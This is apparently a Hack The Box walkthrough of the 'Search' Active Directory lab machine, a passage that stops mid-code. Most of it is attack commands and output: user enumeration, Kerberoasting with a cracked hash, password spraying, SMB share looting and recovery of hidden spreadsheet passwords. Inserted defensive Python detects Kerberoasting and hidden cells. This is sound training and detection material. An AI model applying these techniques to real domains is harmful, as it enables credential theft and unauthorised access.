HTB - Search

Machine Info
Search is a hard difficulty Windows machine that focuses on Active Directory enumeration and exploitation techniques. Foothold is obtained by finding exposed credentials in a web page, enumerating AD users, running a Kerberoast attack to obtain a crackable hash for a service account and spraying the password against a subset of the discovered accounts, obtaining access to an SMB share where a protected XLSX file containing user data is found. Unprotecting the file leads to a second set of credentials, which gives access to another share where PKCS#12 certificates can be downloaded. After importing the certificates into a web browser, Windows PowerShell Web Access can be used to obtain an interactive shell on the system. Due to misconfigured ACLs, the user can retrieve the password of a group managed service account which can change the password of an administrative user, resulting in high-privileged access to the system via wmiexec or psexec.
Enumeration
Scope
IP Address: 10.10.11.129
Nmap Scan
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Cascade]
└─$ nmap -p- --min-rate 10000 $ip -Pn
PORT STATE SERVICE REASON
53/tcp open domain syn-ack
80/tcp open http syn-ack
88/tcp open kerberos-sec syn-ack
135/tcp open msrpc syn-ack
139/tcp open netbios-ssn syn-ack
443/tcp open https syn-ack
445/tcp open microsoft-ds syn-ack
636/tcp open ldapssl syn-ack
3268/tcp open globalcatLDAP syn-ack
3269/tcp open globalcatLDAPssl syn-ack
8172/tcp open unknown syn-ack
9389/tcp open adws syn-ack
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Cascade]
└─$ sudo nmap -sU $ip --min-rate 10000 --open -v -oN udp-scan -p1-10000
PORT STATE SERVICE
53/udp open domain
88/udp open kerberos-sec
123/udp open ntp
389/udp open ldap
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Cascade]
└─$ nmap -p53,80,88,135,139,443,445,636,3268,3269,8172,9389 -sCV $ip -Pn -oN Nmap/script-scan
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
80/tcp open http Microsoft IIS httpd 10.0
| http-methods:
|_ Potentially risky methods: TRACE
|_http-title: Search — Just Testing IIS
|_http-server-header: Microsoft-IIS/10.0
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2024-07-13 08:44:58Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
443/tcp open ssl/http Microsoft IIS httpd 10.0
|_ssl-date: 2024-07-13T08:46:28+00:00; +4s from scanner time.
| tls-alpn:
|_ http/1.1
| ssl-cert: Subject: commonName=research
| Not valid before: 2020-08-11T08:13:35
|_Not valid after: 2030-08-09T08:13:35
| http-methods:
|_ Potentially risky methods: TRACE
445/tcp open microsoft-ds?
636/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: search.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=research
| Not valid before: 2020-08-11T08:13:35
|_Not valid after: 2030-08-09T08:13:35
|_ssl-date: 2024-07-13T08:46:28+00:00; +4s from scanner time.
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: search.htb0., Site: Default-First-Site-Name)
|_ssl-date: 2024-07-13T08:46:28+00:00; +4s from scanner time.
| ssl-cert: Subject: commonName=research
| Not valid before: 2020-08-11T08:13:35
|_Not valid after: 2030-08-09T08:13:35
3269/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: search.htb0., Site: Default-First-Site-Name)
|_ssl-date: 2024-07-13T08:46:28+00:00; +4s from scanner time.
| ssl-cert: Subject: commonName=research
| Not valid before: 2020-08-11T08:13:35
|_Not valid after: 2030-08-09T08:13:35
8172/tcp open ssl/http Microsoft IIS httpd 10.0
|_ssl-date: 2024-07-13T08:46:28+00:00; +4s from scanner time.
|_http-server-header: Microsoft-IIS/10.0
|_http-title: Site doesn't have a title.
| tls-alpn:
|_ http/1.1
| ssl-cert: Subject: commonName=WMSvc-SHA2-RESEARCH
| Not valid before: 2020-04-07T09:05:25
|_Not valid after: 2030-04-05T09:05:25
9389/tcp open mc-nmf .NET Message Framing
Service Info: Host: RESEARCH; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
|_clock-skew: mean: 3s, deviation: 0s, median: 3s
| smb2-time:
| date: 2024-07-13T08:45:49
|_ start_date: N/A
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled and required
* Open ports: 53,80,88,135,139,443,445,636,3268,3269,8172,9389
* UDP Open ports: 53,88,123,389
* Services: DNS - HTTP - HTTPS - LDAP - KERBEROS - RPC - SMB
* Versions: IIS httpd 10.0
* Important Notes: Domain: search.htb - IIS 10.0 on 8172
SMB Enumeration
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Search]
└─$ smbclient -N -L //$ip
Anonymous login successful
Sharename Type Comment
--------- ---- -------
Reconnecting with SMB1 for workgroup listing.
do_connect: Connection to 10.10.11.129 failed (Error NT_STATUS_RESOURCE_NAME_NOT_FOUND)
Unable to connect with SMB1 -- no workgroup available
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Search]
└─$ crackmapexec smb $ip -u '' -p '' --shares
SMB 10.10.11.129 445 RESEARCH [+] search.htb\:
SMB 10.10.11.129 445 RESEARCH [-] Error enumerating shares: STATUS_ACCESS_DENIED
RPC Enumeration
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Search]
└─$ rpcclient -U '%' $ip
rpcclient $> enumdomusers
result was NT_STATUS_ACCESS_DENIED
rpcclient $> srvinfo
do_cmd: Could not initialise srvsvc. Error was NT_STATUS_ACCESS_DENIED
rpcclient $> enumdomgroups
result was NT_STATUS_ACCESS_DENIED
HTTP Enumeration
Both HTTP and HTTPS serve the same web application. The most interesting thing at first glance is the Our Team section, whose names could be used as usernames.
I created a wordlist of their names and ran username-anarchy on them to generate the different username formats.
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Search]
└─$ cat users.lst
Keely Lyons
Dax Santiago
Sierra Frye
Kyla Stewart
Kaiara Spencer
Dave Simpson
Ben Thompson
Chris Stewart
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Search]
└─$ /opt/username-anarchy/username-anarchy -i users.lst | tee users.list
<snip>
keely.lyons
keelylyo
keellyon
<snip>
daxsantiago
dax.santiago
<snip>
Next, I enumerate these candidate usernames against Kerberos to find out which of them are valid.
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Search]
└─$ kerbrute userenum --dc $ip -d search.htb -t 100 ./users.list
__ __ __
/ /_____ _____/ /_ _______ __/ /____
/ //_/ _ \/ ___/ __ \/ ___/ / / / __/ _ \
/ ,< / __/ / / /_/ / / / /_/ / /_/ __/
/_/|_|\___/_/ /_.___/_/ \__,_/\__/\___/
Version: v1.0.3 (9dad6e1) - 07/13/24 - Ronnie Flathers @ropnop
2024/07/13 04:57:07 > Using KDC(s):
2024/07/13 04:57:07 > 10.10.11.129:88
2024/07/13 04:57:07 > [+] VALID USERNAME: keely.lyons@search.htb
2024/07/13 04:57:07 > [+] VALID USERNAME: dax.santiago@search.htb
2024/07/13 04:57:07 > [+] VALID USERNAME: sierra.frye@search.htb
I found one more user when using the xato-net-10-million wordlist.
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Search]
└─$ kerbrute userenum --dc $ip -d search.htb -t 100 /usr/share/wordlists/seclists/Usernames/xato-net-10-million-usernames.txt
__ __ __
/ /_____ _____/ /_ _______ __/ /____
/ //_/ _ \/ ___/ __ \/ ___/ / / / __/ _ \
/ ,< / __/ / / /_/ / / / /_/ / /_/ __/
/_/|_|\___/_/ /_.___/_/ \__,_/\__/\___/
Version: v1.0.3 (9dad6e1) - 07/13/24 - Ronnie Flathers @ropnop
2024/07/13 05:13:59 > Using KDC(s):
2024/07/13 05:13:59 > 10.10.11.129:88
2024/07/13 05:14:00 > [+] VALID USERNAME: administrator@search.htb
2024/07/13 05:14:01 > [+] VALID USERNAME: research@search.htb
2024/07/13 05:14:09 > [+] VALID USERNAME: Administrator@search.htb
I tried to get an AS-REP hash for each of these users (AS-REP roasting), but that failed as well: none of them has pre-authentication disabled.
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Search]
└─$ impacket-GetNPUsers search.htb/ -dc-ip $ip -no-pass -request -format hashcat -usersfile final.lst
Impacket v0.12.0.dev1 - Copyright 2023 Fortra
[-] User dax.santiago doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User keely.lyons doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User sierra.frye doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User research doesn't have UF_DONT_REQUIRE_PREAUTH set
I don't like the following part, as it is very CTF-style.
Foothold
Auth as hope.sharp

It says "Send Password to Hope Sharp", followed by "IsolationIsKey!".
Let's do the same thing we did before for that user.
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Search]
└─$ /opt/username-anarchy/username-anarchy -i hope.user| tee -a hope.wordlist
hope
hopesharp
hope.sharp
hopeshar
hopes
h.sharp
hsharp
shope
s.hope
sharph
sharp
sharp.h
sharp.hope
hs
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Search]
└─$ kerbrute userenum --dc $ip -d search.htb -t 100 ./hope.wordlist
__ __ __
/ /_____ _____/ /_ _______ __/ /____
/ //_/ _ \/ ___/ __ \/ ___/ / / / __/ _ \
/ ,< / __/ / / /_/ / / / /_/ / /_/ __/
/_/|_|\___/_/ /_.___/_/ \__,_/\__/\___/
2024/07/13 05:29:12 > [+] VALID USERNAME: hope.sharp@search.htb
One more user found; I will try to authenticate with it.
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Search]
└─$ crackmapexec smb $ip -u hope.sharp -p 'IsolationIsKey?'
SMB 10.10.11.129 445 RESEARCH [+] search.htb\hope.sharp:IsolationIsKey?
I will then enumerate the domain with the credentials I found, starting with the SMB shares.

I have Read access on several shares and Read, Write access on RedirectedFolders$.
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Search]
└─$ crackmapexec smb $ip -u hope.sharp -p 'IsolationIsKey?' -M spider_plus
SMB 10.10.11.129 445 RESEARCH [+] search.htb\hope.sharp:IsolationIsKey?
SPIDER_P... 10.10.11.129 445 RESEARCH [*] Started spidering plus with option:
SPIDER_P... 10.10.11.129 445 RESEARCH [*] DIR: ['print$']
SPIDER_P... 10.10.11.129 445 RESEARCH [*] EXT: ['ico', 'lnk']
SPIDER_P... 10.10.11.129 445 RESEARCH [*] SIZE: 51200
SPIDER_P... 10.10.11.129 445 RESEARCH [*] OUTPUT: /tmp/cme_spider_plus
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Search]
└─$ nano /tmp/cme_spider_plus/10.10.11.129.json
"CertEnroll": {
"Research.search.htb_search-RESEARCH-CA.crt": {
"atime_epoch": "2020-04-07 03:29:29",
"ctime_epoch": "2020-04-07 03:29:29",
"mtime_epoch": "2020-04-07 03:29:29",
"size": "883 Bytes"
},
"nsrev_search-RESEARCH-CA.asp": {
"atime_epoch": "2020-04-07 03:29:31",
"ctime_epoch": "2020-04-07 03:29:31",
"mtime_epoch": "2020-04-07 03:29:31",
"size": "330 Bytes"
},
"search-RESEARCH-CA+.crl": {
"atime_epoch": "2024-07-13 04:38:27",
"ctime_epoch": "2020-04-07 03:29:32",
"mtime_epoch": "2024-07-13 04:38:27",
"size": "735 Bytes"
},
"search-RESEARCH-CA.crl": {
"atime_epoch": "2024-07-13 04:38:25",
"ctime_epoch": "2020-04-07 03:29:32",
"mtime_epoch": "2024-07-13 04:38:25",
"size": "931 Bytes"
}
<snip>
"sierra.frye/Desktop/user.txt": {
"atime_epoch": "2021-11-17 19:55:27",
"ctime_epoch": "2021-11-17 19:55:27",
"mtime_epoch": "2021-11-17 20:18:26",
"size": "33 Bytes"
},
"sierra.frye/user.txt": {
"atime_epoch": "2021-11-17 19:55:27",
"ctime_epoch": "2021-11-17 19:55:27",
"mtime_epoch": "2021-11-17 20:01:45",
"size": "33 Bytes"
<snip>
"search.htb/Policies/{31B2F340-016D-11D2-945F-00C04FB984F9}/MACHINE/Preferences/Groups/Groups.xml": {
"atime_epoch": "2020-04-07 08:25:21",
"ctime_epoch": "2020-04-07 08:25:14",
"mtime_epoch": "2020-04-07 08:25:21",
"size": "634 Bytes"
},
"search.htb/Policies/{31B2F340-016D-11D2-945F-00C04FB984F9}/MACHINE/Preferences/Services/Services.xml": {
"atime_epoch": "2020-04-09 16:40:35",
"ctime_epoch": "2020-04-09 16:39:42",
"mtime_epoch": "2020-04-09 16:40:35",
"size": "693 Bytes"
I will connect to the SMB server and download the files found.
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Search]
└─$ smbclient -U hope.sharp \\\\$ip\\CertEnroll
Password for [WORKGROUP\hope.sharp]:
smb: \> ls
. Dc 0 Sat Jul 13 04:38:27 2024
.. Dc 0 Sat Jul 13 04:38:27 2024
nsrev_search-RESEARCH-CA.asp Ac 330 Tue Apr 7 03:29:31 2020
Research.search.htb_search-RESEARCH-CA.crt Ac 883 Tue Apr 7 03:29:29 2020
search-RESEARCH-CA+.crl Ac 735 Sat Jul 13 04:38:27 2024
search-RESEARCH-CA.crl Ac 931 Sat Jul 13 04:38:25 2024
smb: \> mget *
Do the same for Groups.xml and Services.xml. I didn't find anything in them anyway :)

The RedirectedFolders$ share is important and has several folders in it, so I will mount it on my Kali machine.
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Search]
└─$ sudo mount -t cifs "\\\\$ip\\RedirectedFolders$" ./mount -o "username=hope.sharp,password=IsolationIsKey?"
[sudo] password for kali:
┌──(kali㉿kali)-[~/…/HTB/machines/Search/mount]
└─$ ls
Angie.Duffy Cameron.Melendez Cortez.Hickman Edith.Walls Reginald.Morton abril.suarez chanel.bell edgar.jacobs frederick.cuevas jayla.roberts santino.benjamin trace.ryan
Antony.Russo Claudia.Pugh Eddie.Stevens Jordan.Gregory Savanah.Velazquez belen.compton dax.santiago eve.galvan hope.sharp payton.harmon sierra.frye
The folder sierra.frye contains the flag, but I couldn't read it.
When we have Write access on a share, we could place a Shell Command File (.scf) in it; if any user browses the share (they don't even need to open the file), their machine will connect back to my SMB server.
I tried placing a .scf on the share as well, but with no luck :(
Auth with web_svc
Running BloodHound to collect information, while also looking for Kerberoastable users.
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Search]
└─$ bloodhound-python -u 'hope.sharp' -p 'IsolationIsKey?' -ns $ip -d search.htb -c all
<snip>
Since I have a valid username and password, I will check whether there is any Kerberoastable account.
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Search]
└─$ impacket-GetUserSPNs search.htb/hope.sharp:'IsolationIsKey?' -dc-ip $ip
Impacket v0.12.0.dev1 - Copyright 2023 Fortra
ServicePrincipalName Name MemberOf PasswordLastSet LastLogon Delegation
--------------------------------- ------- -------- -------------------------- --------- ----------
RESEARCH/web_svc.search.htb:60001 web_svc 2020-04-09 08:59:11.329031 <never>
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Search]
└─$ impacket-GetUserSPNs search.htb/hope.sharp:'IsolationIsKey?' -dc-ip $ip -request
Impacket v0.12.0.dev1 - Copyright 2023 Fortra
ServicePrincipalName Name MemberOf PasswordLastSet LastLogon Delegation
--------------------------------- ------- -------- -------------------------- --------- ----------
RESEARCH/web_svc.search.htb:60001 web_svc 2020-04-09 08:59:11.329031 <never>
[-] CCache file is not found. Skipping...
$krb5tgs$23$*web_svc$SEARCH.HTB$search.htb/web_svc*$f3f3fd4fb0614c575add9b79b9965c17$<snip>
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Search]
└─$ hashcat -m 13100 kerberos.hash /usr/share/wordlists/rockyou.txt
$krb5tgs$23$*web_svc$SEARCH.HTB$search.htb/web_svc*$f3f3fd4fb0614c575add9b79b9965c17$6b816bedbacc2f81ecf9312be18bba19d3d028c0e5be49399fb677d22fdd04950e9faf80f78ad046e003a0ab373e3542fbdb7b3e55fe24b838f7b4d433837e3fa36600141084aedeb74cf4ba9b9b108235e3ab256e47fb37ae4c49380b72faeeb90366c857b1ff9fc8e7bf35d584a90b455dbaa113221485ec524a72fa02160ad3ef2081d629f476805598791cb6bc6de576c82ef96e62ba729523f1302bdad997fc727ad91e1e642f8d458acb62e512014f186fc41d642ef6d32fc5d375cec6989f135f9f9701bf4706cdb8185de61b4bd55144f2b755d84cd13113f43f224b1277dee3f6a770f908d05eaa8eb9897fa6f151c0dfcdaa3bfc473f6826ea72d9edbb1ec5710ec05378039cbb0469f30a22b1fb6d46fca8e9838beeca0879138ca8c01f1c34803d9c91b2b9d53f310d921c2245873496f51c19f6510a51ff7ce71136a7c48cbabf1e37d045d90f78b12d16f50f5df4144e4569fb35551d1d943d32d8e59d237e672587985a16c0a2744aa6571062f7a882f0a1502bd23f51198fb312399fa7b7caba16d67834c0099488100f569eb5f3cc30e2e7957d21c4948d44ba824657d87efa292197dbc12fc178ddcb4b24bd8dda75c5123346dc57fccc6373291985826d30be3e80c748eb296ab516a86acc16376dfd047e508159cdbd967babf8bad80a33824f92a772d5c18e69966fa9cc216c8e88fb4cfb050cfdeccaba80ea26b027fbad96dd03534aa8f7cdf60a310a45d81d1d9f596466617b5b0b2b4c6d3160483118359d68cc1a2e145ff47254ff53be12658db5eefa933533f6417607c865fac6fc70935719a2a8955c0dec44f3475dcdfc9b0ada516cb49fe136655ea63e71e757116cb4a775a4c13a535718cb631f68a2f013f873249526d7461fa5d61c46288624be1ec7e233f263f2cdfd5a1b81f89f82455261af2880dbe7bb19d3bea2bab1e00ec76bf7751e9d862554b6b0b8df7c03ca2159cab24c68c0c66ca42fb8615464d12115a83c1d73c936c95205ff6b9d93a283b21aabca8698dfad71310d9c84b259f9c7764b9676b4d01426c6ecdaaeabae269c4d4fde33b070eae96e0b7284861ddeeb237c0be49976a75e91c82be41c3e766467aa942b73e8bb2619bf5be4f10f5d018538633105ed817ebac5488d363e66c19e5a1848adfae25094860b7730c8cf4a631f514d1f04f298e85354a42fdba67b4dfc8a5da19efc185bb2348955bf04411088061a1e440a89f60fdbb80967da565d4b5e3ac722510f1529ec3df25bd06cb7e708db884a092e84c5ae9b9c0c31a70641816a7ed8bf9e190ae46058ae582db2b2808db2b5a962ade01e191a311e085
4f6f37fe99e60f3014526a3a6ff32a72c227bd2fc055c4dfde32f4250e003aedd2d7281e52e1f1a4396c8c655fd848c609017574254e2776135480dec99c67bfcf4645b6ac2e9c7a50e39802b40c82375d02cf885d36e8d:@3ONEmillionbaby
Session..........: hashcat
Status...........: Cracked
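The Kerberoast above works because the ticket for web_svc was issued with RC4-HMAC (the 23 in $krb5tgs$23$) and the account's password was in rockyou. On the defensive side the request leaves a trace: every service ticket request is logged as Security event 4769 together with its TicketEncryptionType, and a burst of RC4 (0x17) tickets for several SPN-bearing user accounts from one client is the classic signature. The following Python is an added example, not part of the original write-up or of any tool it uses; the 4769 records it runs on are constructed, and the SPN names sql_svc and backup_svc and the client addresses are invented for the sample.

```python
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample of Windows Security event 4769 ("A Kerberos service ticket
# was requested") records, reduced to the EventData fields this check needs:
# (TimeCreated, TargetUserName, ServiceName, TicketEncryptionType, IpAddress, Status).
# These are not real logs; sql_svc, backup_svc and the client addresses are invented.
SAMPLE_4769 = [
    ("2024-07-13T08:51:00", "hope.sharp@SEARCH.HTB",   "web_svc",    "0x17", "::ffff:10.10.14.5",  "0x0"),
    ("2024-07-13T08:51:01", "hope.sharp@SEARCH.HTB",   "sql_svc",    "0x17", "::ffff:10.10.14.5",  "0x0"),
    ("2024-07-13T08:51:01", "hope.sharp@SEARCH.HTB",   "backup_svc", "0x17", "::ffff:10.10.14.5",  "0x0"),
    ("2024-07-13T08:51:02", "hope.sharp@SEARCH.HTB",   "RESEARCH$",  "0x17", "::ffff:10.10.14.5",  "0x0"),  # machine account: not a roast target
    ("2024-07-13T08:55:00", "hope.sharp@SEARCH.HTB",   "krbtgt",     "0x12", "::ffff:10.10.14.5",  "0x0"),  # TGT traffic: ignored
    ("2024-07-13T09:00:00", "sierra.frye@SEARCH.HTB",  "web_svc",    "0x12", "::ffff:10.10.11.50", "0x0"),  # AES ticket: normal use
    ("2024-07-13T09:30:00", "dax.santiago@SEARCH.HTB", "sql_svc",    "0x17", "::ffff:10.10.11.51", "0x0"),  # one RC4 ticket: below threshold
    ("2024-07-13T09:31:00", "dax.santiago@SEARCH.HTB", "web_svc",    "0x17", "::ffff:10.10.11.51", "0x7"),  # failed request (Status != 0x0): ignored
]

RC4_HMAC = "0x17"             # etype 23 as logged in 4769; AES128 is 0x11, AES256 is 0x12
WINDOW = timedelta(minutes=5)
THRESHOLD = 3                 # distinct RC4 service tickets from one client inside WINDOW


def is_roastable_spn(service_name: str) -> bool:
    """Machine accounts ($) have long random passwords and krbtgt entries are
    TGTs, so neither is what a Kerberoaster asks for; everything else is a user
    account that carries an SPN."""
    return not service_name.endswith("$") and service_name.lower() != "krbtgt"


def detect_kerberoast(events, window=WINDOW, threshold=THRESHOLD):
    """Return one alert per client IP that obtained RC4 service tickets for at
    least `threshold` distinct roastable accounts within `window`."""
    per_client = defaultdict(list)
    for ts, requester, service, etype, ip, status in events:
        if status != "0x0" or etype != RC4_HMAC or not is_roastable_spn(service):
            continue
        per_client[ip].append((datetime.fromisoformat(ts), requester, service))

    alerts = []
    for ip, reqs in per_client.items():
        reqs.sort()
        for i, (start, _, _) in enumerate(reqs):
            in_window = [r for r in reqs[i:] if r[0] - start <= window]
            services = sorted({svc for _, _, svc in in_window})
            if len(services) >= threshold:
                alerts.append({
                    "client": ip,
                    "requester": in_window[0][1],
                    "first_seen": start.isoformat(),
                    "services": services,
                })
                break          # one alert per client is enough for triage
    return alerts


if __name__ == "__main__":
    for alert in detect_kerberoast(SAMPLE_4769):
        print(f"[!] {alert['client']} ({alert['requester']}) pulled RC4 tickets for "
              f"{', '.join(alert['services'])} starting {alert['first_seen']}")
```

Run as a script it prints a single alert for the burst client; the AES request and the lone RC4 request stay silent. The check has no baselining, so window and threshold need tuning per environment, and the durable fix is on the account itself: a long random password or a gMSA for anything that carries an SPN, and AES-only encryption types on it so that RC4 tickets are never issued in the first place.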
I created a wordlist of domain usernames with rpcclient and will then spray web_svc's password against them, since I didn't find anything interesting about that user in BloodHound or in the shares.
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Search]
└─$ rpcclient -U 'web_svc%@3ONEmillionbaby' $ip -c "enumdomusers" | cut -d: -f2 | cut -d"[" -f2 | cut -d"]" -f1 | tee -a domain_users.list
<snip>
Amare.Serrano
Savanah.Knox
Frederick.Cuevas
Marshall.Skinner
Edgar.Jacobs
Elisha.Watts
Belen.Compton
Amari.Mora
Cadence.Conner
Katelynn.Costa
<snip>
Auth with Edgar.Jacobs
Got a hit with user Edgar.Jacobs.

I looked in BloodHound to see whether this user has any high privileges, but no luck, so I will enumerate the shares with that user.

Running the spider_plus module with crackmapexec, I found that:
* the helpdesk share is empty
* RedirectedFolders$ has an interesting file at edgar.jacobs/Desktop/Phishing_Attempt.xlsx, which may contain valid credentials or important data
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Search]
└─$ crackmapexec smb $ip -u Edgar.Jacobs -p '@3ONEmillionbaby' -M spider_plus
SMB 10.10.11.129 445 RESEARCH [*] Windows 10 / Server 2019 Build 17763 x64 (name:RESEARCH) (domain:search.htb) (signing:True) (SMBv1:False)
SMB 10.10.11.129 445 RESEARCH [+] search.htb\Edgar.Jacobs:@3ONEmillionbaby
SPIDER_P... 10.10.11.129 445 RESEARCH [*] Started spidering plus with option:
SPIDER_P... 10.10.11.129 445 RESEARCH [*] DIR: ['print$']
SPIDER_P... 10.10.11.129 445 RESEARCH [*] EXT: ['ico', 'lnk']
SPIDER_P... 10.10.11.129 445 RESEARCH [*] SIZE: 51200
SPIDER_P... 10.10.11.129 445 RESEARCH [*] OUTPUT: /tmp/cme_spider_plus
"helpdesk": {}
<snip>
"RedirectedFolders$": {
"edgar.jacobs/Desktop/Phishing_Attempt.xlsx": {
"atime_epoch": "2020-08-10 06:30:05",
"ctime_epoch": "2020-04-09 16:06:41",
"mtime_epoch": "2020-08-10 06:30:05",
"size": "22.59 KB"
},
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Search]
└─$ smbclient -U Edgar.Jacobs \\\\$ip\\RedirectedFolders$
Password for [WORKGROUP\Edgar.Jacobs]:
smb: \> cd edgar.jacobs\Desktop\
smb: \edgar.jacobs\Desktop\> get Phishing_Attempt.xlsx
Privilege Escalation
Shell as sierra.frye
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Search]
└─$ exiftool Phishing_Attempt.xlsx
<snip>
File Type : XLSX
File Type Extension : xlsx
MIME Type : application/vnd.openxmlformats-officedocument.spreadsheetml.sheet
Zip Required Version : 20
Zip Bit Flag : 0x0006
Zip Compression : Deflated
Zip Modify Date : 1980:01:01 00:00:00
Zip CRC : 0xcc14a176
Zip Compressed Size : 442
Zip Uncompressed Size : 1996
Zip File Name : [Content_Types].xml
Last Modified By : Edgar Jacobs
<snip>
The file is an XLSX workbook (a zip archive), so I will first view it in Microsoft Excel.
It has two sheets, Passwords 01082020 and Captured.
Passwords 01082020

Captured

There was no interesting data in the two sheets, so I will unzip the file and explore its contents.
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Search]
└─$ unzip Phishing_Attempt.xlsx
Archive: Phishing_Attempt.xlsx
inflating: [Content_Types].xml
inflating: _rels/.rels
inflating: xl/workbook.xml
inflating: xl/_rels/workbook.xml.rels
inflating: xl/worksheets/sheet1.xml
inflating: xl/worksheets/sheet2.xml
inflating: xl/theme/theme1.xml
inflating: xl/styles.xml
inflating: xl/sharedStrings.xml
inflating: xl/drawings/drawing1.xml
inflating: xl/charts/chart1.xml
inflating: xl/charts/style1.xml
inflating: xl/charts/colors1.xml
inflating: xl/worksheets/_rels/sheet1.xml.rels
inflating: xl/worksheets/_rels/sheet2.xml.rels
inflating: xl/drawings/_rels/drawing1.xml.rels
inflating: xl/charts/_rels/chart1.xml.rels
inflating: xl/printerSettings/printerSettings1.bin
inflating: xl/printerSettings/printerSettings2.bin
inflating: xl/calcChain.xml
inflating: docProps/core.xml
inflating: docProps/app.xml
The sharedStrings.xml file holds the text of the second sheet, but it contains more data than Excel displayed when I opened the workbook.
The extra values sit between <t>*</t> tags.
┌──(kali㉿kali)-[~/…/HTB/machines/Search/xlsx]
└─$ cat xl/sharedStrings.xml
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<sst xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" count="49" uniqueCount="49"><si><t>firstname</t></si><si><t>lastname</t></si><si><t>password</t></si><si><t>Payton</t></si><si><t>Harmon</t></si><si><t>Cortez</t></si><si><t>Hickman</t></si><si><t>Bobby</t></si><si><t>Wolf</t></si><si><t>Margaret</t></si><si><t>Robinson</t></si><si><t>Costa</t></si><si><t>Scarlett</t></si><si><t>Parks</t></si><si><t>Eliezer</t></si><si><t>Jordan</t></si><si><t>Hunter</t></si><si><t>Kirby</t></si><si><t>Annabelle</t></si><si><t>Wells</t></si><si><t>Eve</t></si><si><t>Galvan</t></si><si><t>Jeramiah</t></si><si><t>Fritz</t></si><si><t>Abby</t></si><si><t>Gonzalez</t></si><si><t>Joy</t></si><si><t>Vincent</t></si><si><t>Sutton</t></si><si><t>Sierra</t></si><si><t>Frye</t></si><si><t>Username</t></si><si><t>Date</t></si><si><t>Captured Passwords</t></si><si><t>IT ChangeOver Keely Lyons Started</t></si><si><t>//51+mountain+DEAR+noise+83//</t></si><si><t>++47|building|WARSAW|gave|60++</t></si><si><t>!!05_goes_SEVEN_offer_83!!</t></si><si><t>~~27%when%VILLAGE%full%00~~</t></si><si><t>==95~pass~QUIET~austria~77==</t></si><si><t>//61!banker!FANCY!measure!25//</t></si><si><t>??40:student:MAYOR:been:66??</t></si><si><t>&&75:major:RADIO:state:93&&</t></si><si><t>**30*venus*BALL*office*42**</t></si><si><t>;;36!cried!INDIA!year!50;;</t></si><si><t>..10-time-TALK-proud-66..</t></si><si><t>??47^before^WORLD^surprise^91??</t></si><si><t>**24&moment&BRAZIL&members&66**</t></si><si><t>$$49=wide=STRAIGHT=jordan=28$$18</t></si></sst>
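The reason the passwords show up here and not in Excel is that the workbook hides the column and protects the sheet, and Excel honours those flags while the file format does not: sheet protection and hidden columns are presentation settings, not encryption, so every value stays in sharedStrings.xml. The following Python is an added example, not from the original write-up; it builds a small constructed workbook of the same shape in memory (only the two parts the check reads, with invented names and a placeholder password), then walks each worksheet for hidden columns, hidden rows and a sheetProtection element and resolves the cells that live in them through the shared string table.

```python
import io
import re
import zipfile
import xml.etree.ElementTree as ET

NS = {"m": "http://schemas.openxmlformats.org/spreadsheetml/2006/main"}
TRUE = ("1", "true")   # both spellings of an OOXML boolean attribute


def build_sample_xlsx() -> bytes:
    """Constructed minimal workbook: column C is hidden, row 3 is hidden and the
    sheet is protected. Only sharedStrings.xml and one worksheet are written."""
    shared = (
        '<?xml version="1.0" encoding="UTF-8" standalone="yes"?>'
        '<sst xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" '
        'count="6" uniqueCount="6">'
        "<si><t>firstname</t></si><si><t>lastname</t></si><si><t>password</t></si>"
        "<si><t>Example</t></si><si><t>User</t></si><si><t>not-a-real-password</t></si>"
        "</sst>"
    )
    sheet = (
        '<?xml version="1.0" encoding="UTF-8" standalone="yes"?>'
        '<worksheet xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main">'
        '<cols><col min="3" max="3" width="0" hidden="1" customWidth="1"/></cols>'
        "<sheetData>"
        '<row r="1"><c r="A1" t="s"><v>0</v></c><c r="B1" t="s"><v>1</v></c>'
        '<c r="C1" t="s"><v>2</v></c></row>'
        '<row r="2"><c r="A2" t="s"><v>3</v></c><c r="B2" t="s"><v>4</v></c>'
        '<c r="C2" t="s"><v>5</v></c></row>'
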